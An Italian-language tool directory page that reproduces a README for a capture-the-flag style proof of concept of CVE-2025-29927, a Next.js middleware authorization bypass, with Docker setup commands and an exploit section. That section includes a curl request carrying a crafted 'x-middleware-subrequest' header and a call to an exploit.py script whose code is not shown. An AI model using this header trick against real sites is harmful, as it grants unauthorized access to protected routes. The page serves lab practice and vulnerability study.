Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-29927 | Kitploit
Strumenti/GitHubGitHub/mhamzakhattak/cve-2025-29927
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-29927 - Bypass dell'autorizzazione del middleware di Next.js (PoC)

Questa è una Proof of Concept in stile Capture The Flag (CTF) per la vulnerabilità Bypass dell'autorizzazione del middleware di Next.js (CVE-2025-29927). L'obiettivo è bypassare il middleware di autenticazione e recuperare la flag dalla route /protected.


Riepilogo della vulnerabilità

  • CVE: CVE-2025-29927
  • Tipo: Bypass dell'autorizzazione
  • Componente: Middleware di Next.js
  • Impatto: Accesso non autorizzato alle route protette
  • Route di destinazione della PoC: /protected
  • Comportamento atteso: Gli utenti non autorizzati vengono reindirizzati a /
  • Comportamento vulnerabile: L'utilizzo di una richiesta appositamente modificata consente di bypassare il reindirizzamento e accedere direttamente al contenuto protetto

Setup della PoC

1. Clona il repository

root@kitploit:~
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. Compila ed esegui l'app vulnerabile

root@kitploit:~
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

Questo avvierà l'app Next.js vulnerabile su http://IP:3000


Sfruttamento

1. Senza exploit

Prova ad accedere a:

root@kitploit:~
curl -i http://IP:3000/protected

Verrai reindirizzato a /.

root@kitploit:~
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. Con exploit

Usa lo script exploit.py fornito per bypassare il middleware e accedere alla route protetta:

root@kitploit:~
python3 exploit.py -url http://IP:3000

In caso di successo, recupererai la flag da /protected.


File

  • Dockerfile - Costruisce l'applicazione Next.js vulnerabile
  • exploit.py - Sfrutta la vulnerabilità per bypassare l'autenticazione
  • pages/ - Contiene le route vulnerabili /protected e /login
  • middleware.js - La logica del middleware vulnerabile
  • README.md - Questo file

Disclaimer

Questa PoC è esclusivamente a scopo educativo e di ricerca. Non utilizzarla su sistemi che non possiedi o sui quali non hai ricevuto esplicita autorizzazione al test.


🏁 Flag

Trova la flag sfruttando la vulnerabilità e accedendo a:

root@kitploit:~
http://IP:3000/protected

Buona fortuna! 🏴‍☠️

Scarica lo strumento